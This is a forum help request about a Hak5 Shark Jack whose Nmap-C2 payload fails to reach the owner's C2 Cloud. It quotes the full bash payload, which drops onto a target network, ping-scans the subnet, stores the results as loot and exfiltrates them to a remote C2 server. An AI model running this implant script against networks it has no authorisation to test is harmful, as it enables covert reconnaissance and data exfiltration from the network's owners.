Hi Forum
I've bought an essentialKit, and have most of it running as expected.
I've downloaded the payload from Hak5 Git repos - this payload --> https://github.com/hak5/sharkjack-payloads/tree/master/payloads/library/recon/Nmap-C2
The Sharkjack is updated to the latest firmware - Version 1.1.0, and I can see the Sharkjack does everything that I want, the loot is created etc.
I can see that during execution of the payload the Sharkjack gets an IP on the target network - but nothing gets through to my C2 Cloud.
As far as I can see, it shouldn't be an issue with my C2 Cloud, since I have a Wifi Pineapple, LAN Turtle and Squirrel running and connecting to C2 Cloud.
How can I check this further, since as far as I can see I cannot SSH to the Sharkjack while the payloads run? I have tried reconfiguring my C2 Cloud settings on the Jack several times without any luck.
The Executed payload:
#!/bin/bash
#
# Title: Nmap Payload for Shark Jack w/ C2
# Author: Hak5 (modifications from REDD)
# Version: 1.1
#
# All credit goes to Hak5 Team. I just through in a simple check for if
# C2 is provisioned in the SharkJack. - If so, exfiltrate!
#
# Scans target subnet with Nmap using specified options. Saves each scan result
# to loot storage folder. Exfiltrates all scans to C2 if provisioned.
#
# LED SETUP ... Obtaining IP address from DHCP
# LED ATTACK ... Scanning
# LED FINISH ... Scan Complete
#
# See nmap --help for options. Default "-sP" ping scans the address space for
# fast host discovery.
C2PROVISION="/etc/device.config"
NMAP_OPTIONS="-sP --host-timeout 30s --max-retries 3"
LOOT_DIR=/root/loot/nmap
# Setup loot directory, DHCP client, and determine subnet
LED SETUP
mkdir -p $LOOT_DIR
COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1))
NETMODE DHCP_CLIENT
while [ -z "$SUBNET" ]; do
  sleep 1 && SUBNET=$(ip addr | grep -i eth0 | grep -i inet | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}[\/]{1}[0-9]{1,2}" | sed 's/\.[0-9]*\//\.0\//')
done
# Scan network
LED ATTACK
nmap $NMAP_OPTIONS $SUBNET -oN $LOOT_DIR/nmap-scan_$COUNT.txt
# Exfiltrate Loot to Cloud C2
if [[ -f "$C2PROVISION" ]]; then
  LED SPECIAL
  # Connect to Cloud C2
  C2CONNECT
  # Wait until Cloud C2 connection is established
  while ! pgrep cc-client; do sleep 1; done
  # Exfiltrate all test loot files
  FILES="$LOOT_DIR/*.txt"
  for f in $FILES; do C2EXFIL STRING $f Nmap-C2-Payload; done
else
  # Exit script if not provisioned for C2
  LED R SOLID
  exit 1
fi
LED FINISH
sleep 2 && halt
Can I just disable the last 2 lines, so I can SSH into the Jack to see what, and if, there's an error while trying to connect to my C2 Cloud?
Since everything else is working as intended, I do not get why I can't get this Sharkjack to deliver to my C2 Cloud.
Any ideas of what is wrong?
/P